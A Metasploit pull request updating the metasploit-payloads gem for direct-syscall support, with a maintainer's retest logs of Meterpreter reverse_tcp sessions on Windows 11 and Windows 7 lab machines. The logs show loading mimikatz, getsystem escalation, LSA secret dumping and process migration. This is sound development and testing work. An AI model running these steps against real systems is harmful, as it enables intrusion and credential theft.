Update metasploit-payloads gem to 2.0.165

[zeroSteiner]

Includes changes from:

• Pull in changes from ReflectiveDLLInjection to support direct syscalls (2) metasploit-payloads#694

[cdelafuente-r7]

Thanks @zeroSteiner, I did a quick retest to make sure the payload generated by automation are working as expected.

• output using a x64 Meterpreter payload against Win11 x64 (loading extension, migrating to a x86 process, etc.)

msf6 payload(cmd/windows/powershell/x64/meterpreter/reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-26CQRHP\n00tmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 3408
[*] Migrating from 2292 to 3408...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 11 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

• output using a x86 Meterpreter payload against Win7 x86 (loading extension, etc.)

msf6 payload(cmd/windows/powershell/meterpreter/reverse_tcp) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN7-DEV
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: WIN7-DEV\nutmeg
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

meterpreter > migrate 480
[*] Migrating from 2452 to 480...
[*] Migration completed successfully.
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : DESKTOP-26CQRHP
SysKey : <redacted>

Local name : DESKTOP-26CQRHP ( S-1-5-21-2018954162-2495490444-3936086963 )
Domain name : WORKGROUP

Policy subsystem is : 1.18
...<redacted>...

[cdelafuente-r7]

Release Notes

This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.